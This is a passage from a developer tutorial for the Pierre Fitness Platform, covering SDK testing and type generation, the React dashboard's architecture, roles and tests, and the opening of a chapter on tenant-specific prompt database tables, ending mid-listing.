The SDK uses Jest for testing with three test tiers:
Unit Tests
Fast, isolated tests for individual functions:
npm run test:unit
Integration Tests
Tests requiring a running Pierre server:
# Start Pierre server first
cd .. && cargo run --bin pierre-mcp-server &
# Run integration tests
cd sdk && npm run test:integration
End-to-End Tests
Full workflow tests simulating Claude Desktop:
npm run test:e2e
All Tests
npm run test:all
Test configuration (sdk/package.json):
{
"jest": {
"testEnvironment": "node",
"testTimeout": 30000,
"testMatch": ["**/test/**/*.test.js"]
}
}
Legacy Test Scripts
Individual test files for specific scenarios:
# SSE/Streamable HTTP transport test
npm run test:legacy:sse
# Complete E2E Claude Desktop simulation
npm run test:legacy:e2e
# OAuth flow testing
npm run test:legacy:oauth
Type Generation Pipeline
The SDK auto-generates TypeScript types from Pierre server tool schemas.
How It Works
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ Pierre Server │────►│ generate-sdk- │────►│ sdk/src/ │
│ (tools/list) │ │ types.js │ │ types.ts │
└─────────────────┘ └──────────────────┘ └─────────────────┘
▲ │
│ ▼
JSON-RPC JSON Schema → TypeScript
tools/list type conversion
Generate Types
Step 1: Start Pierre server
cd .. && RUST_LOG=warn cargo run --bin pierre-mcp-server
Step 2: Run type generation
cd sdk && npm run generate-types
Source: scripts/generate-sdk-types.js:23-76
async function fetchToolSchemas() {
const requestData = JSON.stringify({
jsonrpc: '2.0',
id: 1,
method: 'tools/list',
params: {}
});
const options = {
hostname: 'localhost',
port: SERVER_PORT,
path: '/mcp',
method: 'POST',
headers: {
'Content-Type': 'application/json',
...(JWT_TOKEN ? { 'Authorization': `Bearer ${JWT_TOKEN}` } : {})
}
};
// ... HTTP request to fetch schemas
}
Type Generation Output
The generator creates sdk/src/types.ts with:
- Parameter interfaces (47 tools):
export interface GetActivitiesParams {
start_date?: string;
end_date?: string;
limit?: number;
provider?: string;
}
- Common data types:
export interface Activity {
id: string;
name: string;
type: string;
distance?: number;
// ... all activity fields
}
- Tool name union:
export type ToolName = "get_activities" | "get_athlete" | ...;
- Type map:
export interface ToolParamsMap {
"get_activities": GetActivitiesParams;
"get_athlete": GetAthleteParams;
// ...
}
When to Regenerate Types
Regenerate types when:
- Adding new tools in the Rust server
- Modifying tool parameter schemas
- Changing tool response structures
# Full regeneration workflow
cargo build --release
./target/release/pierre-mcp-server &
cd sdk && npm run generate-types
npm run build
Modifying the Bridge Client
The bridge client (src/bridge.ts) is the core of the SDK. Here’s how to modify it.
Understanding the Architecture
Source: sdk/src/bridge.ts (structure)
// OAuth client provider for authentication
class PierreOAuthClientProvider implements OAuthClientProvider {
// OAuth flow implementation
}
// Main bridge client
export class PierreMcpClient {
private config: BridgeConfig;
private oauthProvider: PierreOAuthClientProvider;
private mcpClient: Client;
private mcpServer: Server;
async start(): Promise<void> {
// 1. Initialize OAuth provider
// 2. Create MCP client (HTTP to Pierre)
// 3. Create MCP server (stdio to host)
// 4. Connect and start
}
}
Adding a New Configuration Option
- Add to BridgeConfig interface:
// sdk/src/bridge.ts
export interface BridgeConfig {
pierreServerUrl: string;
// ... existing options
myNewOption?: string; // Add here
}
- Use in client logic:
async start(): Promise<void> {
if (this.config.myNewOption) {
// Handle new option
}
}
- Add CLI flag (sdk/src/cli.ts):
program
.option('--my-new-option <value>', 'Description', process.env.MY_NEW_OPTION);
Adding Custom Request Handling
To intercept or modify MCP requests:
// In PierreMcpClient.start()
this.mcpServer.setRequestHandler(ListToolsRequestSchema, async () => {
// Custom handling before forwarding to Pierre
const result = await this.mcpClient.listTools();
// Custom post-processing
return result;
});
Using MCP Inspector
The MCP Inspector is a debugging tool for testing MCP servers:
# Start inspector with SDK CLI
npm run inspect
# Or with explicit CLI arguments
npm run inspect:cli
Source: sdk/package.json:22-23
{
"scripts": {
"inspect": "npx @modelcontextprotocol/inspector node dist/cli.js",
"inspect:cli": "npx @modelcontextprotocol/inspector --cli node dist/cli.js"
}
}
The inspector provides:
- Visual tool listing
- Interactive tool calls
- Request/response logging
- OAuth flow testing
Secure Storage Development
The SDK uses OS-native keychain for token storage.
Source: sdk/src/secure-storage.ts (structure)
export class SecureTokenStorage {
private serviceName: string;
async storeToken(key: string, value: string): Promise<void> {
// Uses @napi-rs/keyring for OS-native storage
}
async getToken(key: string): Promise<string | null> {
// Retrieves from keychain
}
async deleteToken(key: string): Promise<void> {
// Removes from keychain
}
}
Platform support:
- macOS: Keychain (
securitycommand) - Windows: Credential Manager
- Linux: Secret Service (libsecret)
Linting and Code Quality
# Run ESLint
npm run lint
# Type checking
npm run type-check
ESLint configuration: sdk/eslint.config.js
Best Practices
1. Logging to stderr
All debug output must go to stderr to keep stdout clean for MCP JSON-RPC:
// GOOD: stderr for debugging
console.error('[DEBUG] Connection established');
// BAD: stdout pollutes MCP protocol
console.log('Debug message'); // DON'T DO THIS
2. Error Handling
Use structured error handling with proper cleanup:
try {
await this.mcpClient.connect();
} catch (error) {
console.error('Connection failed:', error);
await this.cleanup();
throw error;
}
3. Graceful Shutdown
Always handle SIGINT/SIGTERM for clean process termination:
process.on('SIGINT', () => handleShutdown('SIGINT'));
process.on('SIGTERM', () => handleShutdown('SIGTERM'));
4. Type Safety
Use generated types for all tool calls:
import { GetActivitiesParams, Activity } from './types';
const params: GetActivitiesParams = {
limit: 10,
provider: 'strava'
};
const result = await client.callTool('get_activities', params);
Troubleshooting
“Cannot find module” errors
Rebuild the SDK:
npm run build
Type generation fails
Ensure Pierre server is running and accessible:
curl http://localhost:8081/health
OAuth flow not completing
Check callback port is available:
lsof -i :35535
Tests timing out
Increase Jest timeout in package.json:
{
"jest": {
"testTimeout": 60000
}
}
Key Takeaways
-
Node.js 24+: Required for the SDK’s JavaScript engine features.
-
Type generation: Run
npm run generate-typesafter server tool changes to keep TypeScript types in sync. -
Three test tiers: Unit tests (fast), integration tests (require server), E2E tests (full simulation).
-
Secure storage: Uses OS-native keychain via
@napi-rs/keyringfor token security. -
stderr for logging: Keep stdout clean for MCP JSON-RPC protocol messages.
-
MCP Inspector: Use
npm run inspectfor interactive debugging. -
Bridge architecture:
PierreMcpClienttranslates stdio ↔ HTTP, OAuth handled byPierreOAuthClientProvider. -
Build system: esbuild for fast production builds, tsx for development.
Next Chapter: Chapter 33: Frontend Development Tutorial - Learn how to develop and extend the Pierre React frontend application.
Chapter 33: Frontend Development Tutorial
This chapter provides a hands-on guide to developing and extending the Pierre React frontend dashboard. You’ll learn how to set up your development environment, understand the component architecture, run tests, and modify the application.
Development Environment Setup
1. Install Dependencies
cd frontend
npm install
Key dependencies:
- React 19.1.0: UI framework with hooks
- TypeScript 5.8.3: Type safety
- Vite 6.4.1: Development server and bundler
- TailwindCSS 3.4.17: Utility-first CSS
- @tanstack/react-query 5.80.7: Server state management
2. Start Development Server
npm run dev
The development server runs at http://localhost:5173 with:
- Hot module replacement (HMR)
- Vite proxy to backend (avoids CORS issues)
- TypeScript checking
3. Build for Production
npm run build
Production build outputs to dist/ directory.
Project Structure
frontend/
├── src/
│ ├── App.tsx # Root component and routing
│ ├── main.tsx # React entry point
│ ├── index.css # Global styles (TailwindCSS)
│ ├── components/ # React components (35+)
│ │ ├── Dashboard.tsx # Main dashboard container
│ │ ├── ChatTab.tsx # AI chat interface (52KB)
│ │ ├── AdminConfiguration.tsx # Admin settings
│ │ ├── UserSettings.tsx # User preferences
│ │ ├── Login.tsx # Authentication
│ │ ├── Register.tsx # User registration
│ │ ├── ui/ # Reusable UI primitives
│ │ └── __tests__/ # Component tests
│ ├── contexts/ # React contexts
│ │ ├── AuthContext.tsx # Authentication state
│ │ ├── WebSocketProvider.tsx # Real-time updates
│ │ └── auth.ts # Auth types
│ ├── services/ # API service layer
│ │ └── api.ts # Axios-based API client
│ ├── hooks/ # Custom React hooks
│ ├── types/ # TypeScript definitions
│ └── firebase/ # Firebase integration
├── e2e/ # Playwright E2E tests (282 tests)
├── integration/ # Integration test config
├── public/ # Static assets
├── tailwind.config.cjs # TailwindCSS configuration
├── vite.config.ts # Vite configuration
└── playwright.config.ts # Playwright configuration
Component Architecture
Root Component (App.tsx)
The root component handles authentication flow and routing:
Source: frontend/src/App.tsx:40-165
function AppContent() {
const { user, isAuthenticated, isLoading } = useAuth();
const [authView, setAuthView] = useState<AuthView>('login');
// OAuth callback handling
useEffect(() => {
const params = getOAuthCallbackParams();
if (params) {
setOauthCallback(params);
// Invalidate queries to refresh connection state
localQueryClient.invalidateQueries({ queryKey: ['oauth-status'] });
}
}, [localQueryClient]);
// Authentication flow
if (!isAuthenticated) {
return authView === 'register' ? <Register /> : <Login />;
}
// User status flow
if (user?.user_status === 'pending') return <PendingApproval />;
if (user?.user_status === 'suspended') return <SuspendedView />;
// Dashboard for active users
return <Dashboard />;
}
Context Providers
The app wraps components with three providers:
function App() {
return (
<QueryClientProvider client={queryClient}>
<AuthProvider>
<WebSocketProvider>
<AppContent />
</WebSocketProvider>
</AuthProvider>
</QueryClientProvider>
);
}
- QueryClientProvider: React Query for server state
- AuthProvider: User authentication and session
- WebSocketProvider: Real-time updates
Dashboard Tabs
The Dashboard component renders different interfaces based on user role:
| Tab | Component | Description |
|---|---|---|
| Home | OverviewTab.tsx | Statistics overview |
| Connections | UnifiedConnections.tsx | A2A clients, API keys |
| MCP Tokens | MCPTokensTab.tsx | Token management |
| Analytics | UsageAnalytics.tsx | Usage charts |
| Monitor | RequestMonitor.tsx | Request logs |
| Settings | UserSettings.tsx | Profile settings |
| Admin | AdminConfiguration.tsx | Admin-only settings |
Admin vs User Mode
Pierre has three user roles that determine the UI experience:
| Role | Access Level | Default Tab |
|---|---|---|
user | User mode only | Chat |
admin | Admin + User modes | Overview |
super_admin | Full access including token management | Overview |
User Mode (Regular Users)
Source: frontend/src/components/Dashboard.tsx:207-248
Regular users see a clean, focused interface:
┌─────────────────────────────────────────────────────────────────┐
│ Pierre Fitness Intelligence │
├─────────────────────────────────────────────────────────────────┤
│ │
│ AI Chat Interface │
│ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ │ │
│ │ Welcome! Ask me about your fitness data. │ │
│ │ │ │
│ │ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │ │
│ │ │ Training │ │ Nutrition │ │ Recovery │ │ │
│ │ │ ⚡ Activity │ │ 🥗 Amber │ │ 💤 Indigo │ │ │
│ │ └─────────────┘ └─────────────┘ └─────────────┘ │ │
│ │ │ │
│ │ [Message input field...] [Send] │ │
│ └──────────────────────────────────────────────────────────┘ │
│ │
│ [⚙️ Settings] │
└─────────────────────────────────────────────────────────────────┘
User mode features:
- Chat Tab: AI conversation with prompt suggestions organized by pillar
- Settings Tab: Access via gear icon in chat header
// Dashboard.tsx - User mode check
if (!isAdminUser) {
return (
<div className="h-screen bg-white flex flex-col overflow-hidden">
{/* Minimal header */}
<header className="h-12 border-b border-pierre-gray-100">
<PierreLogoSmall />
<span>Pierre Fitness Intelligence</span>
</header>
{/* Chat or Settings content */}
<main className="flex-1 overflow-hidden">
{activeTab === 'chat' && <ChatTab onOpenSettings={() => setActiveTab('settings')} />}
{activeTab === 'settings' && <UserSettings />}
</main>
</div>
);
}
User Settings Tabs
Source: frontend/src/components/UserSettings.tsx:45-83
Regular users have access to four settings tabs:
| Tab | Description | Features |
|---|---|---|
| Profile | User identity | Display name, email (read-only), avatar |
| Connections | OAuth credentials | Add/remove Strava, Fitbit, Garmin, WHOOP, Terra credentials |
| API Tokens | MCP tokens | Create/revoke tokens for Claude Desktop, Cursor IDE |
| Account | Account management | Status, role, sign out, danger zone |
const SETTINGS_TABS: { id: SettingsTab; name: string }[] = [
{ id: 'profile', name: 'Profile' },
{ id: 'connections', name: 'Connections' },
{ id: 'tokens', name: 'API Tokens' },
{ id: 'account', name: 'Account' },
];
Admin Mode (Admin/Super Admin)
Source: frontend/src/components/Dashboard.tsx:250-540
Admins see a full sidebar with navigation:
┌──────────────┬──────────────────────────────────────────────────┐
│ │ │
│ [Pierre] │ Overview │
│ │ │
│ Overview ● │ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐│
│ Connections │ │ Total Users │ │ Active Keys │ │ Requests ││
│ Analytics │ │ 127 │ │ 45 │ │ 12,847 ││
│ Monitor │ └─────────────┘ └─────────────┘ └─────────────┘│
│ Tools │ │
│ Users 🔴 │ Weekly Usage Chart │
│ Config │ [═══════════════════════════════════════] │
│ Prompts │ │
│ Settings │ Rate Limits A2A Connections │
│ │ [████████░░] 80% ● Client A Connected │
│ ────────── │ ● Client B Connected │
│ 👤 Admin │ │
│ [Sign out] │ │
│ │ │
└──────────────┴──────────────────────────────────────────────────┘
Admin tabs (9 total):
| Tab | Component | Description |
|---|---|---|
| Overview | OverviewTab.tsx | Dashboard statistics, quick links |
| Connections | UnifiedConnections.tsx | A2A clients, OAuth connections |
| Analytics | UsageAnalytics.tsx | Usage charts, trends |
| Monitor | RequestMonitor.tsx | Real-time request logs |
| Tools | ToolUsageBreakdown.tsx | Tool usage analysis |
| Users | UserManagement.tsx | User list, approve/suspend (badge shows pending count) |
| Configuration | AdminConfiguration.tsx | LLM providers, tenant settings |
| Prompts | PromptsAdminTab.tsx | Manage AI prompts (see Chapter 34) |
| Settings | AdminSettings.tsx | Auto-approval, security settings |
Super admin additional tab:
| Tab | Component | Description |
|---|---|---|
| Admin Tokens | ApiKeyList.tsx / ApiKeyDetails.tsx | System API key management |
// Admin tabs definition
const adminTabs: TabDefinition[] = [
{ id: 'overview', name: 'Overview', icon: <ChartIcon /> },
{ id: 'connections', name: 'Connections', icon: <WifiIcon /> },
{ id: 'analytics', name: 'Analytics', icon: <GraphIcon /> },
{ id: 'monitor', name: 'Monitor', icon: <EyeIcon /> },
{ id: 'tools', name: 'Tools', icon: <GearIcon /> },
{ id: 'users', name: 'Users', icon: <UsersIcon />, badge: pendingUsers.length },
{ id: 'configuration', name: 'Configuration', icon: <SlidersIcon /> },
{ id: 'prompts', name: 'Prompts', icon: <ChatIcon /> },
{ id: 'admin-settings', name: 'Settings', icon: <SettingsIcon /> },
];
// Super admin extends with token management
const superAdminTabs = [
...adminTabs,
{ id: 'admin-tokens', name: 'Admin Tokens', icon: <KeyIcon /> },
];
Role Detection
Source: frontend/src/components/Dashboard.tsx:77-82
const { user, logout } = useAuth();
const isAdminUser = user?.role === 'admin' || user?.role === 'super_admin';
const isSuperAdmin = user?.role === 'super_admin';
// Default tab based on role
const [activeTab, setActiveTab] = useState(isAdminUser ? 'overview' : 'chat');
Admin-Only Features
Users Tab (UserManagement.tsx):
- View all registered users
- Approve pending registrations
- Suspend/unsuspend users
- View user activity details
Configuration Tab (AdminConfiguration.tsx):
- LLM provider selection (OpenAI, Anthropic, etc.)
- Model configuration
- Tenant-specific settings
Prompts Tab (PromptsAdminTab.tsx):
- Manage prompt categories
- Edit welcome message
- Customize system prompt
- Reset to defaults
Settings Tab (AdminSettings.tsx):
- Toggle auto-approval for registrations
- System information display
- Security recommendations
Pending Users Badge
The Users tab shows a red badge when users are pending approval:
const { data: pendingUsers = [] } = useQuery<User[]>({
queryKey: ['pending-users'],
queryFn: () => apiService.getPendingUsers(),
staleTime: 30_000,
enabled: isAdminUser,
});
// In tab definition
{ id: 'users', name: 'Users', badge: pendingUsers.length > 0 ? pendingUsers.length : undefined }
Sidebar Collapse
The admin sidebar can be collapsed for more screen space:
const [sidebarCollapsed, setSidebarCollapsed] = useState(false);
// Collapsed: 72px, Expanded: 260px
<aside className={clsx(
'fixed left-0 top-0 h-screen',
sidebarCollapsed ? 'w-[72px]' : 'w-[260px]'
)}>
Service Layer
API Service (services/api.ts)
The ApiService class centralizes all HTTP communication:
Source: frontend/src/services/api.ts:10-62
class ApiService {
private csrfToken: string | null = null;
constructor() {
axios.defaults.baseURL = API_BASE_URL;
axios.defaults.headers.common['Content-Type'] = 'application/json';
axios.defaults.withCredentials = true;
this.setupInterceptors();
}
private setupInterceptors() {
// Add CSRF token to state-changing requests
axios.interceptors.request.use((config) => {
if (this.csrfToken && ['POST', 'PUT', 'DELETE', 'PATCH'].includes(config.method?.toUpperCase() || '')) {
config.headers['X-CSRF-Token'] = this.csrfToken;
}
return config;
});
// Handle 401 authentication failures
axios.interceptors.response.use(
(response) => response,
async (error) => {
if (error.response?.status === 401) {
this.handleAuthFailure();
}
return Promise.reject(error);
}
);
}
}
Key API Methods
// Authentication
await apiService.login(email, password);
await apiService.loginWithFirebase(idToken);
await apiService.logout();
await apiService.register(email, password, displayName);
// API Keys
await apiService.createApiKey({ name, description, rate_limit_requests });
await apiService.getApiKeys();
await apiService.deactivateApiKey(keyId);
// A2A Clients
await apiService.createA2AClient(data);
await apiService.getA2AClients();
// Admin Operations
await apiService.getPendingUsers();
await apiService.approveUser(userId);
await apiService.suspendUser(userId);
await apiService.startImpersonation(targetUserId, reason);
React Query Integration
Components use React Query for data fetching:
import { useQuery, useMutation, useQueryClient } from '@tanstack/react-query';
function ApiKeyList() {
const queryClient = useQueryClient();
// Fetch API keys
const { data: apiKeys, isLoading } = useQuery({
queryKey: ['api-keys'],
queryFn: () => apiService.getApiKeys(),
});
// Deactivate mutation
const deactivateMutation = useMutation({
mutationFn: (keyId: string) => apiService.deactivateApiKey(keyId),
onSuccess: () => {
queryClient.invalidateQueries({ queryKey: ['api-keys'] });
},
});
return (
<div>
{apiKeys?.map((key) => (
<ApiKeyCard
key={key.id}
apiKey={key}
onDeactivate={() => deactivateMutation.mutate(key.id)}
/>
))}
</div>
);
}
Authentication Context
Source: frontend/src/contexts/AuthContext.tsx:16-187
export function AuthProvider({ children }: { children: React.ReactNode }) {
const [user, setUser] = useState<User | null>(null);
const [token, setToken] = useState<string | null>(null);
const [isLoading, setIsLoading] = useState(true);
const [impersonation, setImpersonation] = useState<ImpersonationState>(...);
const login = async (email: string, password: string) => {
const response = await apiService.login(email, password);
const { access_token, csrf_token, user: userData } = response;
apiService.setCsrfToken(csrf_token);
setToken(access_token);
setUser(userData);
localStorage.setItem('jwt_token', access_token);
};
// Admin impersonation
const startImpersonation = useCallback(async (targetUserId: string) => {
if (user?.role !== 'super_admin') {
throw new Error('Only super admins can impersonate users');
}
const response = await apiService.startImpersonation(targetUserId);
setImpersonation({
isImpersonating: true,
targetUser: response.target_user,
originalUser: user,
});
}, [user]);
return (
<AuthContext.Provider value={{ user, token, login, logout, ... }}>
{children}
</AuthContext.Provider>
);
}
WebSocket Real-Time Updates
The WebSocketProvider enables real-time dashboard updates:
// Connect to WebSocket for live updates
const { connectionStatus, subscribe, lastMessage } = useWebSocket();
// Subscribe to usage updates
useEffect(() => {
subscribe('usage');
subscribe('system');
}, [subscribe]);
// React to real-time messages
useEffect(() => {
if (lastMessage?.type === 'usage_update') {
// Update UI with new usage data
}
}, [lastMessage]);
Adding New Features
1. Create a New Component
// src/components/MyNewFeature.tsx
import { useQuery } from '@tanstack/react-query';
import { apiService } from '../services/api';
export function MyNewFeature() {
const { data, isLoading, error } = useQuery({
queryKey: ['my-feature'],
queryFn: () => apiService.getMyFeatureData(),
});
if (isLoading) return <LoadingSpinner />;
if (error) return <ErrorMessage error={error} />;
return (
<div className="bg-white rounded-lg shadow p-6">
<h2 className="text-lg font-semibold text-pierre-gray-900">
My New Feature
</h2>
{/* Feature content */}
</div>
);
}
2. Add API Method
// src/services/api.ts
async getMyFeatureData() {
const response = await axios.get('/api/my-feature');
return response.data;
}
async updateMyFeature(data: MyFeatureData) {
const response = await axios.put('/api/my-feature', data);
return response.data;
}
3. Add to Dashboard
// src/components/Dashboard.tsx
import { MyNewFeature } from './MyNewFeature';
// Add to tabs array
const tabs = [
// ... existing tabs
{ id: 'my-feature', label: 'My Feature', component: MyNewFeature },
];
Testing
Unit Tests (Vitest)
# Run tests in watch mode
npm test
# Run with UI
npm run test:ui
# Run with coverage
npm run test:coverage
Test example (frontend/src/components/tests/):
import { render, screen, fireEvent } from '@testing-library/react';
import { describe, it, expect, vi } from 'vitest';
import { Login } from '../Login';
describe('Login', () => {
it('submits login form', async () => {
const mockLogin = vi.fn();
render(<Login onLogin={mockLogin} />);
fireEvent.change(screen.getByLabelText(/email/i), {
target: { value: 'test@example.com' },
});
fireEvent.change(screen.getByLabelText(/password/i), {
target: { value: 'password123' },
});
fireEvent.click(screen.getByRole('button', { name: /sign in/i }));
expect(mockLogin).toHaveBeenCalledWith('test@example.com', 'password123');
});
});
E2E Tests (Playwright)
The E2E suite covers 282 tests across 13 spec files:
# Run all E2E tests
npm run test:e2e
# Run with Playwright UI
npm run test:e2e:ui
# Run in headed mode (visible browser)
npm run test:e2e:headed
# Run specific test file
npx playwright test e2e/connections.spec.ts
Test structure (e2e/):
import { test, expect } from '@playwright/test';
import { setupDashboardMocks, loginToDashboard, navigateToTab } from './test-helpers';
test.describe('API Keys', () => {
test.beforeEach(async ({ page }) => {
await setupDashboardMocks(page, { role: 'admin' });
await loginToDashboard(page);
await navigateToTab(page, 'Connections');
});
test('creates new API key', async ({ page }) => {
await page.click('[data-testid="create-api-key"]');
await page.fill('[name="name"]', 'Test Key');
await page.click('[type="submit"]');
await expect(page.locator('.success-message')).toBeVisible();
});
});
Integration Tests
npm run test:integration
npm run test:integration:ui
Pierre Design System
Color Palette
The frontend uses Pierre’s custom TailwindCSS theme:
/* Pierre brand colors */
.text-pierre-violet /* #6366F1 - Primary brand color */
.bg-pierre-gray-50 /* #F9FAFB - Background */
.text-pierre-gray-900 /* #111827 - Primary text */
.bg-pierre-activity /* #10B981 - Success/activity */
.text-pierre-performance /* #F59E0B - Warning/performance */
Component Patterns
Card pattern:
<div className="bg-white rounded-lg shadow p-6">
<h3 className="text-lg font-semibold text-pierre-gray-900">
Card Title
</h3>
<p className="text-sm text-pierre-gray-600 mt-2">
Card content
</p>
</div>
Button variants:
// Primary button
<button className="bg-pierre-violet text-white px-4 py-2 rounded-lg hover:bg-pierre-violet-dark">
Primary Action
</button>
// Secondary button
<button className="border border-pierre-gray-300 text-pierre-gray-700 px-4 py-2 rounded-lg hover:bg-pierre-gray-50">
Secondary Action
</button>
Loading states:
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-pierre-violet" />
Best Practices
1. Type Safety
Always define TypeScript interfaces:
interface ApiKey {
id: string;
name: string;
created_at: string;
expires_at?: string;
rate_limit_requests: number;
usage_count: number;
}
2. Error Handling
Use React Query’s error handling:
const { data, error, isError } = useQuery({ ... });
if (isError) {
return (
<div className="bg-red-50 text-red-700 p-4 rounded-lg">
Error: {error.message}
</div>
);
}
3. Loading States
Always show loading feedback:
if (isLoading) {
return (
<div className="flex items-center justify-center h-64">
<div className="animate-spin rounded-full h-12 w-12 border-b-2 border-pierre-violet" />
</div>
);
}
4. Query Invalidation
Invalidate queries after mutations:
const mutation = useMutation({
mutationFn: apiService.createApiKey,
onSuccess: () => {
queryClient.invalidateQueries({ queryKey: ['api-keys'] });
toast.success('API key created');
},
});
5. Accessibility
Include ARIA attributes and keyboard navigation:
<button
aria-label="Delete API key"
onClick={handleDelete}
className="focus:ring-2 focus:ring-pierre-violet focus:outline-none"
>
Delete
</button>
Troubleshooting
CORS Errors
The Vite dev server proxies API requests. If you see CORS errors:
- Ensure Pierre server is running on port 8081
- Check
vite.config.tsproxy configuration
Authentication Issues
Clear browser storage and re-authenticate:
localStorage.clear();
window.location.reload();
React Query Stale Data
Force refresh queries:
queryClient.invalidateQueries();
Key Takeaways
-
React 19 + TypeScript: Modern React with full type safety.
-
React Query: Server state management with automatic caching and refetching.
-
Context providers:
AuthProviderfor auth,WebSocketProviderfor real-time updates. -
API service: Centralized Axios client with interceptors for CSRF and auth.
-
TailwindCSS: Utility-first styling with Pierre’s custom theme.
-
Testing pyramid: Unit (Vitest), E2E (Playwright, 282 tests), Integration.
-
Component-based: 35+ components organized by feature.
-
User flows: Registration → Pending → Approved → Active lifecycle.
-
Admin features: Impersonation, user management, system settings.
-
Real-time: WebSocket integration for live dashboard updates.
End of Tutorial
You’ve completed the comprehensive Pierre Fitness Platform tutorial! You now understand:
- Part I: Foundation (architecture, errors, config, DI)
- Part II: Authentication & Security (cryptography, JWT, multi-tenancy, middleware)
- Part III: MCP Protocol (JSON-RPC, request flow, transports, tool registry)
- Part IV: SDK & Type System (bridge architecture, type generation)
- Part V: OAuth, A2A & Providers (OAuth server/client, provider abstraction, A2A protocol)
- Part VI: Tools & Intelligence (47 tools, sports science algorithms, recovery, nutrition)
- Part VII: Testing & Deployment (synthetic data, design system, production deployment)
- SDK Development: TypeScript SDK with type generation pipeline
- Frontend Development: React dashboard with 35+ components
Next Steps:
- Review CLAUDE.md for code standards
- Explore the codebase using Appendix C as a map
- Run the test suite to see synthetic data in action
- Set up local development environment
- Contribute improvements or new features
Happy coding!
Chapter 34: Database System Prompts
This chapter covers Pierre’s database-backed prompt management system, which enables tenant-specific customization of AI chat suggestions, welcome messages, and system instructions.
Architecture Overview
┌─────────────────────────────────────────────────────────────────┐
│ Prompt Management System │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ Prompt │ │ Welcome │ │ System │ │
│ │ Categories │ │ Prompt │ │ Prompt │ │
│ └──────┬───────┘ └──────┬───────┘ └──────┬───────┘ │
│ │ │ │ │
│ └───────────────────┼────────────────────┘ │
│ │ │
│ ┌───────▼───────┐ │
│ │ PromptManager │ │
│ │ (SQLite) │ │
│ └───────┬───────┘ │
│ │ │
│ ┌──────────────┼──────────────┐ │
│ │ │ │ │
│ ┌─────▼─────┐ ┌─────▼─────┐ ┌────▼─────┐ │
│ │ Tenant A │ │ Tenant B │ │ Tenant C │ │
│ │ Prompts │ │ Prompts │ │ Prompts │ │
│ └───────────┘ └───────────┘ └──────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
Database Schema
Prompt Suggestions Table
Source: migrations/20250120000023_prompts_schema.sql
CREATE TABLE IF NOT EXISTS prompt_suggestions (
id TEXT PRIMARY KEY,
tenant_id TEXT NOT NULL REFERENCES tenants(id) ON DELETE CASCADE,
category_key TEXT NOT NULL,
category_title TEXT NOT NULL,
category_icon TEXT NOT NULL,
pillar TEXT NOT NULL CHECK (pillar IN ('activity', 'nutrition', 'recovery')),
prompts TEXT NOT NULL, -- JSON array of prompt strings
display_order INTEGER NOT NULL DEFAULT 0,
is_active INTEGER NOT NULL DEFAULT 1,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL,
UNIQUE(tenant_id, category_key)
);
CREATE INDEX IF NOT EXISTS idx_prompt_suggestions_tenant
ON prompt_suggestions(tenant_id);
CREATE INDEX IF NOT EXISTS idx_prompt_suggestions_active
ON prompt_suggestions(tenant_id, is_active);
CREATE INDEX IF NOT EXISTS idx_prompt_suggestions_order
ON prompt_suggestions(tenant_id, display_order);
Welcome Prompts Table
Source: migrations/20250120000023_prompts_schema.sql (same file)
CREATE TABLE IF NOT EXISTS welcome_prompts (
id TEXT PRIMARY KEY,
tenant_id TEXT NOT NULL UNIQUE REFERENCES tenants(id) ON DELETE CASCADE,
prompt_text TEXT NOT NULL,
is_active INTEGER NOT NULL DEFAULT 1,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL
);
CREATE INDEX IF NOT EXISTS idx_welcome_prompts_tenant
ON welcome_prompts(tenant_id);
System Prompts Table
Source: migrations/20250120000024_system_prompts_schema.sql
CREATE TABLE IF NOT EXISTS system_prompts (
id TEXT PRIMARY KEY,
tenant_id TEXT NOT NULL UNIQUE REFERENCES tenants(id) ON DELETE CASCADE,
prompt_text TEXT NOT NULL,
is_active INTEGER NOT NULL DEFAULT 1,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL
);
CREATE INDEX IF NOT EXISTS idx_system_prompts_tenant
ON system_prompts(tenant_id);
Pillar Classification
Pierre organizes prompts into three “pillars” that align with the fitness intelligence domains:
Source: src/database/prompts.rs:14-27
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "lowercase")]
pub enum Pillar {
/// Activity pillar (Emerald gradient)
Activity,
/// Nutrition pillar (Amber gradient)
Nutrition,
/// Recovery pillar (Indigo gradient)
Recovery,
}
}
Each pillar maps to a distinct visual style in the frontend:
| Pillar | Color Theme | Example Prompts |
|---|---|---|
| Activity | Emerald (#10B981) | “Am I ready for a hard workout?”, “What’s my predicted marathon time?” |
| Nutrition | Amber (#F59E0B) | “How many calories should I eat?”, “Create a high-protein meal” |
| Recovery | Indigo (#6366F1) | “Do I need a rest day?”, “Analyze my sleep quality” |
Data Models
PromptCategory
Source: src/database/prompts.rs:31-52
#![allow(unused)]
fn main() {
pub struct PromptCategory {
pub id: Uuid,
pub tenant_id: String,
pub category_key: String, // Unique within tenant (e.g., "training")
pub category_title: String, // Display title (e.g., "Training")
pub category_icon: String, // Emoji icon (e.g., "runner")
pub pillar: Pillar, // Visual classification
pub prompts: Vec<String>, // List of prompt suggestions
pub display_order: i32, // Lower numbers shown first
pub is_active: bool, // Whether category is visible
}
}
WelcomePrompt
#![allow(unused)]
fn main() {
pub struct WelcomePrompt {
pub id: Uuid,
pub tenant_id: String,
pub prompt_text: String, // Shown to first-time users
pub is_active: bool,
}
}
SystemPrompt
#![allow(unused)]
fn main() {
pub struct SystemPrompt {
pub id: Uuid,
pub tenant_id: String,
pub prompt_text: String, // LLM system instructions (markdown)
pub is_active: bool,
}
}
Default Prompt Categories
Source: src/llm/prompts/prompt_categories.json
[
{
"key": "training",
"title": "Training",
"icon": "runner",
"pillar": "activity",
"prompts": [
"Am I ready for a hard workout today?",
"What's my predicted marathon time?"
]
},
{
"key": "nutrition",
"title": "Nutrition",
"icon": "salad",
"pillar": "nutrition",
"prompts": [
"How many calories should I eat today?",
"What should I eat before my morning run?"
]
},
{
"key": "recovery",
"title": "Recovery",
"icon": "sleep",
"pillar": "recovery",
